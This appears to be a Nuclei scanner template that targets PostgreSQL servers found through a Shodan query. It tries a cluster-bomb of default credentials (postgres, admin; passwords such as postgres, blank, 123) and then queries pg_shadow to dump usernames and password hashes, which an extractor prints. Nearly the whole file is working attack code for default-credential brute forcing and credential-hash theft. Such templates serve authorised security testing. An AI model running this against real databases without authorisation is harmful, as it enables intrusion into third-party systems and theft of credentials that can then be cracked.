id: pgsql-list-password-hashes info: name: PostgreSQL List Password Hashes author: pussycat0x severity: high description: | Dump password hashes in use within a PostgreSQL database. reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md metadata: verified: true max-request: 8 shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated,enum,discovery javascript: - pre-condition: | isPortOpen(Host,Port); code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow"); Export(connected) args: Host: "{{Host}}" Port: 5432 User: "{{usernames}}" Pass: "{{password}}" Db: "{{database}}" payloads: usernames: - postgres - admin password: - postgres - - 123 - amber database: - postgres attack: clusterbomb extractors: - type: json json: - '.Rows[] | "\(.usename) : \(.passwd)"' # digest: 490a0046304402202dca4b438160b93abae5b76b5df5814c8a5aaa0a08396805476f49f98129b58702200d25dfdce66ebd2238d71a7756bf8320c97780b93b94cb63a52430105b541f22:922c64590222798bb761d5b6d8e72950